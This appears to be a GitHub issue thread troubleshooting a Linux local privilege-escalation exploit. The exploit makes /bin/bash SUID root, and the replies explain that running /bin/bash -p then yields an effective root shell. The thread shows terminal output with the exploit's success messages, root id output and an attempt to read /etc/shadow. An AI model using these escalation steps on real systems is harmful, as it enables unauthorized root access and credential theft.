No access to root

[mortals-tx]

Linux c 5.11.0-44-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

command: make fuse

[*] Exploit success! /bin/bash is SUID now!
[+] Popping shell
-p: /root/.bash_profile: Permission denied

No access to root

[chop0]

maybe try making the suid binary something else besides bash

[bcoles]

/bin/bash is executed from within the exploit context which is running in a user namespace.

The set-uid bit was applied successfully. You should get a root shell with /bin/bash -p :

[*] Exploit success! /bin/bash is SUID now!
[+] Popping shell
-p: /root/.bash_profile: Permission denied
root@ubuntu-20-04-desktop-amd64:/home/user# id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
root@ubuntu-20-04-desktop-amd64:/home/user# cat /etc/shadow
cat: /etc/shadow: Permission denied
root@ubuntu-20-04-desktop-amd64:/home/user# logout
-p: /root/.bash_logout: Permission denied
user@ubuntu-20-04-desktop-amd64:~$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1183448 Feb 25  2020 /bin/bash
user@ubuntu-20-04-desktop-amd64:~$ /bin/bash -p
bash-5.0# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare)